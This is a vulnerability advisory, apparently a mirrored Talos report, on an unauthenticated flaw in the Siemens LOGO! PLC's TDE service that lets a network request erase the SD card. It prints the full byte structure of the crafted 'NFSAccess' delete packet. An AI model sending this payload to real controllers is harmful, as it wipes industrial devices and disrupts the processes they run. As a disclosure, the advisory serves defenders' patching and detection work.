Lucene search

Talos IntelligenceTALOS-2020-1024

HistoryJun 09, 2020 - 12:00 a.m.

Siemens LOGO! TDE service "NFSAccess" Delete Denial of Service Vulnerability

2020-06-0900:00:00

Talos Intelligence

www.talosintelligence.com

CVSS2

6.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

EPSS

0.001

Percentile

48.3%

JSON

Summary

An exploitable denial of service vulnerability exists in the TDE service functionality of Siemens LOGO! 1.82.02, 12/24RCE Version 0BA and 230RCE Version 0BA. A specially crafted network request can cause be used to delete critical system data resulting in a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.

Tested Versions

Siemens LOGO! 1.82.02
Siemens LOGO! 12/24RCE Version 0BA
Siemens LOGO! 230RCE Version 0BA

Product URLs

<https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html>

CVSSv3 Score

9.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H

CWE

CWE-306 - Missing Authentication for Critical Function

Details

Siemens LOGO! is an intelligent logic module (PLC) meant for automation projects such as industrial control systems, office/commercial and home settings. It is deployed worldwide and can be control remotely.

The SD card can be completely erased through the LOGO TDE service port 135/TCP using the “NFSAccess” delete function. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/tcp. No user interaction is required to exploit this security vulnerability.

Structure of payload message sent:

\x4B\xd0\x04\xc0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag
\x01\x00\x00\x00 # Context
\x01\x00\x00\x00 # Session
\x4e\x46\x53\x41 # NFSAccess command
\x63\x63\x65\x73
\x73\x00\x00\x00 # Delete
\x00\x00\x00\x00
\x74\x00\x00\x00
\xff\xff\xff\xff
\xff\xff\xff\xff        # File handle
\xff\xff\xff\xff
\x00\x00\x00\x00
\x15\x00\x00\x00 # Data Size
\x00\x00\x00\x00
\x2f\x64\x65\x76 # /dev/sdcard/  # SD card path
\x2f\x73\x64\x63
\x61\x72\x64\x2f
\x00\x00\x00\x00
\x00\x00\x00\x00
\x00"

We were able to identify this vulnerability on firmware 1.82.02 (released on May 13, 2019). Due to hardware similarity, we believe that all the 0BA8 and 0BA7 families are vulnerable independently of hardware type or firmware.

Timeline

2020-03-20 - Vendor Disclosure
2020-06-09 - Public Release

CVSS2

6.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

EPSS

0.001

Percentile

48.3%

JSON

Related for TALOS-2020-1024